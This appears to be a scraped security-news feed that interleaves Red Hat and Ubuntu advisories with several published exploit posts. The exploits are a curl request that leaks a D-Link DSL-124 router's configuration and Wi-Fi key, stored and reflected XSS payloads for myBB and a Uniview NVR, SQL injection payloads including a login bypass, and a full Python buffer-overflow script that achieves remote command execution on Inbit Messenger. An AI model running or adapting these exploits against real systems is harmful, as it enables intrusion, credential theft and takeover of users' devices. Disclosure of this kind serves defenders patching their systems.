DSL-124 Wireless N300 ADSL2+ suffers from a backup disclosure vulnerability.

    # Exploit Title: DSL-124 Wireless N300 ADSL2+ - Backup File Disclosure# Date:  2022-11-10# Exploit Author: Aryan Chehreghani# Vendor Homepage: https://www.dlink.com# Software Link: https://dlinkmea.com/index.php/product/details?det=dU1iNFc4cWRsdUpjWEpETFlSeFlZdz09# Firmware Version: ME_1.00# Tested on: Windows 11# [ Details - DSL-124 ]:#The DSL-124 Wireless N300 ADSL2+ Modem Router is a versatile, high-performance router for a home or small office,#With integrated ADSL2/2+, supporting download speeds up to 24 Mbps, firewall protection,#Quality of Service (QoS),802.11n wireless LAN, and four Ethernet switch ports,#the Wireless N300 ADSL2+ Modem Router provides all the functions that a user needs to establish a secure and high-speed link to the Internet.# [ Description ]:#After the administrator enters and a new session is created, the attacker sends a request using the post method in her system,#and in response to sending this request, she receives a complete backup of the router settings,#In fact this happens because of the lack of management of users and sessions in the network.# [ POC ]:Request :curl -d "submit.htm?saveconf.htm=Back+Settings" -X POST http://192.168.1.1/form2saveConf.cgiResponse :HTTP/1.1 200 OKConnection: closeServer: Virtual Web 0.9Content-Type: application/octet-stream;Content-Disposition: attachment;filename="config.img"Pragma: no-cacheCache-Control: no-cache<Config_Information_File_8671><V N="WLAN_WPA_PSK" V="pass@12345"/><V N="WLAN_WPA_PSK_FORMAT" V="0x0"/><V N="WLAN_WPA_REKEY_TIME" V=""/><V N="WLAN_ENABLE_1X" V="0x0"/><V N="WLAN_ENABLE_MAC_AUTH" V="0x0"/><V N="WLAN_RS_IP" V="0.0.0.0"/>...</Config_Information_File_8671>

DSL-124 Wireless N300 ADSL2+ Backup Disclosure

Red Hat Security Advisory 2023-1529-01 - Service Telemetry Framework provides automated collection of measurements and data from remote clients, such as Red Hat OpenStack Platform or third-party nodes. STF then transmits the information to a centralized, receiving Red Hat OpenShift Container Platform deployment for storage, retrieval, and monitoring. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: Service Telemetry Framework 1.5 security update  
Advisory ID:       RHSA-2023:1529-01  
Product:           Red Hat OpenStack Platform  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1529  
Issue date:        2023-03-30  
CVE Names:         CVE-2022-1705 CVE-2022-23772 CVE-2022-23773   
                   CVE-2022-23806 CVE-2022-24675 CVE-2022-27664   
                   CVE-2022-28327 CVE-2022-29526 CVE-2022-30629   
                   CVE-2022-30630 CVE-2022-30631 CVE-2022-30632   
                   CVE-2022-32189 CVE-2022-41715 CVE-2022-41717   
=====================================================================

1. Summary:

An update is now available for Service Telemetry Framework 1.5.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Service Telemetry Framework (STF) provides automated collection of  
measurements and data from remote clients, such as Red Hat OpenStack  
Platform or third-party nodes. STF then transmits the information to a  
centralized, receiving Red Hat OpenShift Container Platform (OCP)  
deployment for storage, retrieval, and monitoring.

Security Fix(es):

* golang: crypto/elliptic: IsOnCurve returns true for invalid field  
elements (CVE-2022-23806)

* golang: math/big: uncontrolled memory consumption due to an unhandled  
overflow via Rat.SetString (CVE-2022-23772)

* golang: cmd/go: misinterpretation of branch names can lead to incorrect  
access control (CVE-2022-23773)

* golang: encoding/pem: fix stack overflow in Decode (CVE-2022-24675)

* golang: crypto/elliptic: panic caused by oversized scalar  
(CVE-2022-28327)

* golang: syscall: faccessat checks wrong group (CVE-2022-29526)

* golang: compress/gzip: stack exhaustion in Reader.Read (CVE-2022-30631)

* golang: io/fs: stack exhaustion in Glob (CVE-2022-30630)

* golang: net/http: improper sanitization of Transfer-Encoding header  
(CVE-2022-1705)

* golang: path/filepath: stack exhaustion in Glob (CVE-2022-30632)

* golang: net/http: handle server errors after sending GOAWAY  
(CVE-2022-27664)

* golang: regexp/syntax: limit memory used by parsing regexps  
(CVE-2022-41715)

* golang: net/http: An attacker can cause excessive memory growth in a Go  
server accepting HTTP/2 requests (CVE-2022-41717)

* golang: crypto/tls: session tickets lack random ticket_age_add  
(CVE-2022-30629)

* golang: math/big: decoding big.Float and big.Rat types can panic if the  
encoded message is too short, potentially allowing a denial of service  
(CVE-2022-32189)

For more details about the security issue(s), including the impact, a CVSS  
score, and other related information, refer to the CVE page(s) listed in  
the References section.

3. Solution:

The Service Telemetry Framework container image provided by this update can  
be downloaded from the Red Hat Container Registry at  
registry.access.redhat.com. Installation instructions for your platform are  
available at Red Hat Container Catalog (see References).

Dockerfiles and scripts should be amended either to refer to this new image  
specifically, or to the latest image generally.

4. Bugs fixed (https://bugzilla.redhat.com/):

2053429 - CVE-2022-23806 golang: crypto/elliptic: IsOnCurve returns true for invalid field elements  
2053532 - CVE-2022-23772 golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString  
2053541 - CVE-2022-23773 golang: cmd/go: misinterpretation of branch names can lead to incorrect access control  
2077688 - CVE-2022-24675 golang: encoding/pem: fix stack overflow in Decode  
2077689 - CVE-2022-28327 golang: crypto/elliptic: panic caused by oversized scalar  
2084085 - CVE-2022-29526 golang: syscall: faccessat checks wrong group  
2092544 - [RFE] Expose certificate duration in Certificate object for Interconnect  
2092793 - CVE-2022-30629 golang: crypto/tls: session tickets lack random ticket_age_add  
2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read  
2107371 - CVE-2022-30630 golang: io/fs: stack exhaustion in Glob  
2107374 - CVE-2022-1705 golang: net/http: improper sanitization of Transfer-Encoding header  
2107386 - CVE-2022-30632 golang: path/filepath: stack exhaustion in Glob  
2113814 - CVE-2022-32189 golang: math/big: decoding big.Float and big.Rat types can panic if the encoded message is too short, potentially allowing a denial of service  
2124669 - CVE-2022-27664 golang: net/http: handle server errors after sending GOAWAY  
2132872 - CVE-2022-41715 golang: regexp/syntax: limit memory used by parsing regexps  
2161274 - CVE-2022-41717 golang: net/http: An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests  
2176537 - [STF 1.5] Release delivery of STF 1.5.1

5. References:

https://access.redhat.com/security/cve/CVE-2022-1705  
https://access.redhat.com/security/cve/CVE-2022-23772  
https://access.redhat.com/security/cve/CVE-2022-23773  
https://access.redhat.com/security/cve/CVE-2022-23806  
https://access.redhat.com/security/cve/CVE-2022-24675  
https://access.redhat.com/security/cve/CVE-2022-27664  
https://access.redhat.com/security/cve/CVE-2022-28327  
https://access.redhat.com/security/cve/CVE-2022-29526  
https://access.redhat.com/security/cve/CVE-2022-30629  
https://access.redhat.com/security/cve/CVE-2022-30630  
https://access.redhat.com/security/cve/CVE-2022-30631  
https://access.redhat.com/security/cve/CVE-2022-30632  
https://access.redhat.com/security/cve/CVE-2022-32189  
https://access.redhat.com/security/cve/CVE-2022-41715  
https://access.redhat.com/security/cve/CVE-2022-41717  
https://access.redhat.com/security/updates/classification/#moderate

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZCT+ydzjgjWX9erEAQjyzhAAjXstJjR55eBWISAdd1TGXMClBLY0BPzn  
8HGgLzXeq2QPrzo5sxIl/+iDW032fYFW+5Z8GRvMGPkNFm6tZN5PPsv6zyMJppPF  
8erziyaLG1lIczWoib23hYhg9wMKtKkkyP0Yl+E3qfy/POle7GIQUWcTyjfHb0mT  
Wjm9EUgtC/RFxl7+W8xTBe//MxFIDzX5I73zATqKbcWhkT3nX48ZHzthV+62BmGu  
D16afvOFzZb4Pl2+pL/AAkFS/KuD8ZAB/edgFzlrY9p9qGlPYWQ6BikyX/vEsvQG  
oUa3npKQn5kkfZIXdmalJIfvkBx5zhtBEvaFj9Hlw1StQcSpS+ECMhpEvji74wiO  
M/Id75HKHiSAstYEeav1QXScGuDqb1Lvm4NPW4fwulqu2jOcEGKXM/BVlYds47pH  
9LYhHE60jg5oCwf3ajtJPgUtIRRxDS48HLxu8irZYc5XoQLh9rXm6tPnEnDnH8fq  
pBn6lIICM7DOwiFAmFzmgLUVX8kQxqmSAedMZwn+3fBOalosvPSuDGQr5bVeJIlB  
GYWZZ0bRoRHlR3YCVNdISBbL7G1gWBF/1nrOjItrhken8G9RsXWBOwqq6qYpmoPY  
YLQ5kkru0iQpvfkIqyFOnrf0PWczcRBMac/Jubqw6w/smhFQdKkU6+nZzjxX1IbH  
/v0lTHvsH0w=  
=TpaS  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1529-01

Ubuntu Security Notice 5983-1 - Cyku Hong discovered that Nette was not properly handling and validating data used for code generation. A remote attacker could possibly use this issue to execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-5983-1  
March 29, 2023

php-nette vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 18.04 LTS  
- Ubuntu 16.04 ESM

Summary:

Nette could be made to run programs if it received specially crafted  
network traffic.

Software Description:  
- php-nette: Nette Framework

Details:

Cyku Hong discovered that Nette was not properly handling and validating  
data used for code generation. A remote attacker could possibly use this  
issue to execute arbitrary code.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 18.04 LTS:  
   php-nette                       2.4-20160731-1ubuntu0.1

Ubuntu 16.04 ESM:  
   php-nette                       2.3.8-1ubuntu1+esm1

After a standard system update you need to restart any applications using  
Nette to make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-5983-1  
   CVE-2020-15227

Package Information:  
https://launchpad.net/ubuntu/+source/php-nette/2.4-20160731-1ubuntu0.1

Ubuntu Security Notice USN-5983-1

myBB forums version 1.8.26 suffers from a persistent cross site scripting vulnerability.

# Exploit Title: myBB forums 1.8.26 - Stored Cross-Site Scripting (XSS)   
# Exploit Author: Andrey Stoykov  
# Software Link: https://mybb.com/versions/1.8.26/  
# Version: 1.8.26  
# Tested on: Ubuntu 20.04

Stored XSS #1:

To reproduce do the following:

1. Login as administrator user  
2. Browse to "Templates and Style" -> "Templates" -> "Manage Templates" -> =  
"Global Templates"=20  
3. Select "Add New Template" and enter payload "><img src=3Dx onerror=3Dale=  
rt(1)>

// HTTP POST request showing XSS payload

POST /mybb_1826/admin/index.php?module=3Dstyle-templates&action=3Dedit_temp=  
late HTTP/1.1  
Host: 192.168.139.132  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100=  
101 Firefox/106.0  
[...]

my_post_key=3D60dcf2a0bf3090dbd2c33cd18733dc4c&title=3D"><img+src=3Dx+onerr=  
or=3Dalert(1)>&sid=3D-1&template=3D&continue=3DSave+and+Continue+Editing

// HTTP redirect response to specific template

HTTP/1.1 302 Found  
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P=  
erl/v5.16.3  
Location: index.php?module=3Dstyle-templates&action=3Dedit_template&title=  
=3D%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&sid=3D-1  
[...]

// HTTP GET request to newly created template

GET /mybb_1826/admin/index.php?module=3Dstyle-templates&sid=3D-1 HTTP/1.1  
Host: 192.168.139.132  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100=  
101 Firefox/106.0  
[...]

// HTTP response showing unsanitized XSS payload

HTTP/1.1 200 OK  
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P=  
erl/v5.16.3  
X-Powered-By: PHP/5.6.40  
[...]

<tr class=3D"first">  
<td class=3D"first"><a href=3D"index.php?module=3Dstyle-templates&actio=  
n=3Dedit_template&title=3D%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3=  
E&sid=3D-1">"><img src=3Dx onerror=3Dalert(1)></a></td>  
[...]

Stored XSS #2:

To reproduce do the following:

1. Login as administrator user  
2. Browse to "Forums and Posts" -> "Forum Management"  
3. Select "Add New Forum" and enter payload "><script>alert(1)</script>

// HTTP POST request showing XSS payload

POST /mybb_1826/admin/index.php?module=3Dforum-management&action=3Dadd HTTP=  
/1.1  
Host: 192.168.139.132  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100=  
101 Firefox/106.0  
[...]

my_post_key=3D60dcf2a0bf3090dbd2c33cd18733dc4c&type=3Df&title=3D"><script>a=  
lert(1)</script>&description=3D"><script>alert(2)</script[...]

// HTTP response showing successfully added a new forum

HTTP/1.1 200 OK  
Date: Sun, 20 Nov 2022 11:00:28 GMT  
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P=  
erl/v5.16.3  
[...]

// HTTP GET request to fetch forums

GET /mybb_1826/admin/index.php?module=3Dforum-management HTTP/1.1  
Host: 192.168.139.132  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100=  
101 Firefox/106.0  
[...]

// HTTP response showing unsanitized XSS payload

HTTP/1.1 200 OK  
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P=  
erl/v5.16.3  
[...]

<small>Sub Forums:  <a href=3D"index.php?module=3Dforum-management&fid=  
=3D3">"><script>alert(1)</script></a></small>

Stored XSS #3:

To reproduce do the following:

1. Login as administrator user  
2. Browse to "Forums and Posts" -> "Forum Announcements"  
3. Select "Add Announcement" and enter payload "><img+src=3Dx+onerror=3Dale=  
rt(1)>

// HTTP POST request showing XSS payload

POST /mybb_1826/admin/index.php?module=3Dforum-announcements&action=3Dadd H=  
TTP/1.1  
Host: 192.168.139.132  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100=  
101 Firefox/106.0  
[...]

my_post_key=3D60dcf2a0bf3090dbd2c33cd18733dc4c&title=3D"><img+src=3Dx+onerr=  
or=3Dalert(1)>&starttime_day=3D20&starttime_month=3D11&starttime_year=3D202=  
2&starttime_time=3D11:05+AM&endtime_day=3D20&endtime_month=3D11&endtime_yea=  
r=3D2023&endtime_time=3D11:05+AM&endtime_type=3D2&message=3D"><script>alert=  
(2)</script>&fid=3D2&allowmycode=3D1&allowsmilies=3D1

// HTTP response showing successfully added an anouncement

HTTP/1.1 302 Found  
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P=  
erl/v5.16.3  
[...]

// HTTP GET request to fetch forum URL

GET /mybb_1826/ HTTP/1.1  
Host: 192.168.139.132  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100=  
101 Firefox/106.0  
[...]

// HTTP response showing unsanitized XSS payload

HTTP/1.1 200 OK  
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P=  
erl/v5.16.3  
[...]

<a href=3D"forumdisplay.php?fid=3D3" title=3D"">"><script>alert(1)</script>=  
</a>

--sgnirk-590ebdc0-1da1-4f35-a731-39a2519b1c0d--

myBB forums 1.8.26 Cross Site Scripting

Dreamer CMS version 4.0.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Dreamer CMS v4.0.0 - SQL Injection# Date: 2022/10/02 # Exploit Author: lvren# Vendor Homepage: http://cms.iteachyou.cc/# Software Link: https://gitee.com/isoftforce/dreamer_cms/repository/archive/v4.0.0.zip # Version: v4.0.0 # CVE: CVE-2022-43128Proof Of Concept:POST /admin/search/doSearch HTTP/1.1Host: localhost:8888User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 80Origin: http://localhost:8888Connection: closeReferer: http://localhost:8888/admin/search/doSearchCookie: dreamer-cms-s=6387e44f-e700-462d-bba5-d4e0ffff5739Upgrade-Insecure-Requests: 1entity[typeid']=1) AND (SELECT 2904 FROM (SELECT(SLEEP(5)))TdVL) AND (5386=5386lvrenlvren@lvre.ntesmail.com签名由 网易灵犀办公 定制

Dreamer CMS 4.0.0 SQL Injection

Helmet Store Showroom version 1.0 suffers from a remote SQL injection vulnerability that allows for login bypass.

    # Exploit Title: Helmet Store Showroom v1.0 - SQL Injection# Exploit Author: Ameer Hamza# Date: November 15, 2022# Vendor Homepage: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html# Software Link: https://www.sourcecodester.com/download-code?nid=15851&title=Helmet+Store+Showroom+Site+in+PHP+and+MySQL+Free+Source+Code# Tested on: Kali Linux, Apache, Mysql# Vendor: oretnom23# Version: v1.0# Exploit Description:# Helmet Store Showroom v1.0 suffers from SQL injection on the login page which leads to authentication bypass of the admin account.[+] The username parameter is vulnerable to SQLi in login page[+] URL --> http://localhost/hss/admin/login.php[+] Username = ' OR 1=1-- -HTTP REQUESTPOST /hss/classes/Login.php?f=login HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 38Origin: http://localhostConnection: closeReferer: http://localhost/hss/admin/login.phpCookie: PHPSESSID=08o3sl7jk4l442gq19s1t3hvpausername='+OR+1%3D1+--+-&password=1234

Helmet Store Showroom 1.0 SQL Injection

Uniview NVR301-04S2-P4 suffers from a cross site scripting vulnerability.

    # Exploit Title: Uniview NVR301-04S2-P4 - Reflected Cross-Site Scripting (XSS)# Author: Bleron Rrustemi# Discovery Date: 2022-11-15# Vendor Homepage: https://www.uniview.com/tr/Products/NVR/Easy/NVR301-04S2-P4/# Datasheet:: https://www.uniview.com/download.do?id=1761643# Device Firmware: NVR-B3801.20.15.200829# Tested Version: NVR301-04S2-P4# Tested on: Windows 10 Enterprise LTSC 64\Firefox 106.0.5 (64-bit)# Vulnerability Type: Reflected Cross-Site Scripting (XSS)# CVE: N/A  # Proof of Concept:IP=IP of the devicehttp://IP/LAPI/V1.0/System/Security/Login/"><script>alert('1')</script>

Uniview NVR301-04S2-P4 Cross Site Scripting

Inbit Messenger versions 4.6.0 through 4.9.0 suffer from an unauthenticated remote command execution vulnerability.

    # Exploit Title: Inbit Messenger v4.9.0 - Unauthenticated Remote Command Execution (RCE)# Date: 11/08/2022# Exploit Author: a-rey # Vendor Homepage: http://www.inbit.com/support.html# Software Link: http://www.softsea.com/review/Inbit-Messenger-Basic-Edition.html# Version: v4.6.0 - v4.9.0# Tested on: Windows XP SP3, Windows 7, Windows 10, Windows Server 2019# Exploit Write-Up: https://github.com/a-rey/exploits/blob/main/writeups/Inbit_Messenger/v4.6.0/writeup.md#!/usr/bin/env python3# -*- coding: utf-8 -*-import sys, socket, struct, string, argparse, loggingBANNER = """\033[0m\033[1;35m╔══════════════════════════════════════════════════════════════════════════╗║\033[0m Inbit Messenger v4.6.0 - v4.9.0 Unauthenticated Remote Command Execution \033[1;35m║╚══════════════════════════════════════════════════════════════════════════╝\033[0m by: \033[1;36m █████╗      ██████╗ ███████╗██╗   ██╗     \033[1;36m██╔══██╗     ██╔══██╗██╔════╝██║   ██║     \033[1;36m███████║ ███ ██████╔╝█████╗   ██╗ ██═╝     \033[1;36m██╔══██║     ██╔══██╗██╔══╝     ██╔╝       \033[1;36m██║  ██║     ██║  ██║███████╗   ██║        \033[1;36m╚═╝  ╚═╝     ╚═╝  ╚═╝╚══════╝   ╚═╝   \033[0m"""# NOTE: IAT addresses for KERNEL32!WinExec in IMS.EXE by build numberTARGETS = {  4601 : 0x005f3360,  4801 : 0x005f7364,  4901 : 0x005f7364,}# NOTE: min and max values for length of commandCMD_MIN_LEN = 10CMD_MAX_LEN = 0xfc64# NOTE: these bytes cannot be in the calculated address of WinExec to ensure overflowBAD_BYTES = b"\x3e" # >def getWinExecAddress(targetIp:str, targetPort:int) -> bytes:  # NOTE: send packet with client build number of 4601 for v4.6.0  pkt = b"<50><0><IM><ID>7</ID><a>1</a><b>4601</b><c>1</c></IM>\x00"  logging.info(f"trying to get version information from {targetIp}:{targetPort} ...")  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  s.connect((targetIp, targetPort))  s.send(pkt)  _d = s.recv(1024)  # find build tag in response  if b'<c>' not in _d:    logging.error(f"invalid version packet received: {_d}")    sys.exit(-1)  s.close()  try:    build = int(_d[_d.index(b'<c>') + 3:_d.index(b'</c>')])  except:    logging.error(f"failed to parse build number from packet: {_d}")    sys.exit(-1)  # get the IAT offset   if build not in TARGETS.keys():    logging.error(f"unexpected build number: {build}")    sys.exit(-1)  # NOTE: we need to subtract 0x38 since the vulnerable instruction is 'CALL [EAX + 0x38]'  winexec = struct.pack("<I", TARGETS[build] - 0x38)  logging.success(f"target build number is {build}")  logging.info(f"WinExec @ 0x{TARGETS[build] - 0x38:08x}")  # sanity check for bad bytes in WinExec address  for c in winexec:    if c in BAD_BYTES:      logging.error(f"found bad byte in WinExec address: 0x{TARGETS[build] - 0x38:08x}")      sys.exit(-1)  return winexecdef exploit(targetIp:str, targetPort:int, command:bytes) -> None:  # NOTE: command must be NULL terminated  command += b"\x00"  # check user command length  if len(command) < CMD_MIN_LEN:    logging.error(f"command length must be at least {CMD_MIN_LEN} characters")    sys.exit(-1)  if len(command) >= CMD_MAX_LEN:    logging.error(f"command length must be less than {CMD_MAX_LEN} characters")    sys.exit(-1)  # get WinExec address  winexec = getWinExecAddress(targetIp, targetPort)  # get a string representation of the length of the command data after the <> tag parsed by atol()  pktLen = str(len(command))  pkt  = b"<"            # start of XML tag/stack overflow  pkt += pktLen.encode() # number parsed by atol() & length of command data following '>' character  pkt += b"\x00"         # NULL terminator to force atol to ignore what comes next  # NOTE: adjust the 85 byte offset calculated that assumes a 2 byte string passed to atol()  pkt += (b"A" * (85 - (len(pktLen) - 2))) # padding up to function pointer overwrite  pkt += winexec                           # indirect function pointer we control  pkt += b">"                              # end of XML tag/stack overflow  pkt += command                           # the command set to the call to WinExec()  logging.info(f"sending payload to {targetIp}:{targetPort} ...")  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  s.connect((targetIp, targetPort))  s.send(pkt)  s.close()  logging.success("DONE")if __name__ == '__main__':  # parse arguments  parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, usage=BANNER)  parser.add_argument('-t', '--target',  help='target IP',      type=str, required=True)  parser.add_argument('-c', '--command', help='command to run', type=str, required=True)  parser.add_argument('-p', '--port',    help='target port',    type=int, required=False, default=10883)  args = parser.parse_args()  # define logger  logging.basicConfig(format='[%(asctime)s][%(levelname)s] %(message)s', datefmt='%d %b %Y %H:%M:%S', level='INFO')  logging.SUCCESS = logging.CRITICAL + 1  logging.addLevelName(logging.SUCCESS, '\033[0m\033[1;32mGOOD\033[0m')  logging.addLevelName(logging.ERROR,   '\033[0m\033[1;31mFAIL\033[0m')  logging.addLevelName(logging.WARNING, '\033[0m\033[1;33mWARN\033[0m')  logging.addLevelName(logging.INFO,    '\033[0m\033[1;36mINFO\033[0m')  logging.success = lambda msg, *args: logging.getLogger(__name__)._log(logging.SUCCESS, msg, args)  # print banner  print(BANNER)  # run exploit  exploit(args.target, args.port, args.command.encode())

Inbit Messenger 4.9.0 Remote Command Execution

Red Hat Security Advisory 2023-1392-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.10.55.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: OpenShift Container Platform 4.10.55 security update  
Advisory ID:       RHSA-2023:1392-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1392  
Issue date:        2023-03-29  
CVE Names:         CVE-2021-20329 CVE-2022-3564 CVE-2022-4269  
                   CVE-2022-4378 CVE-2023-0767  
====================================================================  
1. Summary:

Red Hat OpenShift Container Platform release 4.10.55 is now available with  
updates to packages and images that fix several bugs and add enhancements.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container  
Platform 4.10.55. See the following advisory for the RPM packages for this  
release:

https://access.redhat.com/errata/RHBA-2023:1391

Security Fix(es):

* mongo-go-driver: specific cstrings input may not be properly validated  
(CVE-2021-20329)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

All OpenShift Container Platform 4.10 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.10/updating/updating-cluster-cli.html

3. Solution:

For OpenShift Container Platform 4.10 see the following documentation,  
which will be updated shortly for this release, for important instructions  
on how to upgrade your cluster and fully apply this asynchronous errata  
update:

https://docs.openshift.com/container-platform/4.10/release_notes/ocp-4-10-release-notes.html

You can download the oc tool and use it to inspect release image metadata  
for x86_64, s390x, ppc64le, and aarch64 architectures. The image digests  
can be found at  
https://quay.io/repository/openshift-release-dev/ocp-release?tab=tags.

The sha values for the release are:

(For x86_64 architecture)  
The image digest is  
sha256:cdf6e83f94d6a9beec65a429ebea6a8f5f80c19df49feb1a78b17981132b922b

(For s390x architecture)  
The image digest is  
sha256:4784b43052f3041059e2cc586f2c3c80591ff92338817a83d3039288e1258eef

(For ppc64le architecture)  
The image digest is  
sha256:5f1124780604fb8de06732bd407c24ac5d6d47df52ec74531d803bd187363bcf

(For aarch64 architecture)  
The image digest is  
sha256:2595defd3ac3d1b41acbf3284d9bf3eb73ac1f58aecffa77e82766e90ee511dc

All OpenShift Container Platform 4.10 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.10/updating/updating-cluster-cli.html.

4. Bugs fixed (https://bugzilla.redhat.com/):

1971033 - CVE-2021-20329 mongo-go-driver: specific cstrings input may not be properly validated

5. JIRA issues fixed (https://issues.jboss.org/):

OCPBUGS-10233 - [4.10] Remove ETCD liviness probe.  
OCPBUGS-10305 - 4.10 NROP OLM z-stream upgrade doesn't work due to CSV issue  
OCPBUGS-10384 - service-monitor/monitor-metallb-controller: connection refused ""server returned HTTP status 502"  
OCPBUGS-5955 - ip-reconciler removes the overlappingrangeipreservations whether the pod is alive or not [backport 4.10]  
OCPBUGS-6835 - [release-4.10] Include openshift_apps_deploymentconfigs_strategy_total to recent_metrics  
OCPBUGS-7021 - [OVN] Egress traffic not balanced when spec.egressIPs has 2 IPs  
OCPBUGS-7736 - [4.10] Afterburn fails on AWS/GCP clusters born in OCP 4.1/4.2  
OCPBUGS-837 - [RHCOS tracker] [BZ#2111937] [ice] trouble re-assigning MACs to VFs, ice stricter than other drivers [rhel-8.4.0.z]  
OCPBUGS-8513 - [4.10] egress firewall acls are deleted on restart

6. References:

https://access.redhat.com/security/cve/CVE-2021-20329  
https://access.redhat.com/security/cve/CVE-2022-3564  
https://access.redhat.com/security/cve/CVE-2022-4269  
https://access.redhat.com/security/cve/CVE-2022-4378  
https://access.redhat.com/security/cve/CVE-2023-0767  
https://access.redhat.com/security/updates/classification/#moderate  
https://docs.openshift.com/container-platform/4.10/release_notes/ocp-4-10-release-notes.html

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZCOtWNzjgjWX9erEAQjfnQ//fMmcSgrElNZV3gZ94N7u85ZamZ5qCCJi  
76J+gA/t4sr7T769+EVCA0MRAOElorDRHnbJ8QSgX6e+rCdtnjjXwlGu/l4BOFIY  
CIYEizOVpghcvkk/scEdiYBiGRSBr9VBMTUVeYesmy4Hl5b2/VYNOCdGm8LHD65y  
csXHcVecjRgSPFYWDy7s2hJsbqVXCx2Jco/ZrmdSXVcSNuyGg6QfSpFwH0udgU/o  
h4YACz8UYASqB30STHO9Eo8VeVah5CZHw1RomFlpm6GmVFxEstRoQgsn9QGLfbfo  
9whu5Cuxc6sCAXuGfzOmMwYaTD8v8sRq8Egxe+0VGNJ+18G+kg6S0D3OYRU8oaIo  
O+/apOeQYimp0uf6pfAfN7nFomsaYBspeEE91KSEQTaeJIFQ5zsBy5oIFc3LCC6W  
5L0AsgCnQH6kIb/t3oqyhnk2tRiTxgNH1mrd6yD3RyBJXOVsypYjZuV4SsqYKEGO  
8466RkW35elS3HY2hrU/i3oDdvs4EggsxUob0fCI+RDuw/19RbeZ7frT44gf8e0u  
JumvW8gvIECSDAaiZSoq2T5mjDPdYhNK96jv17FYHQkZ4EUrwwpgHxxJSNDOFplM  
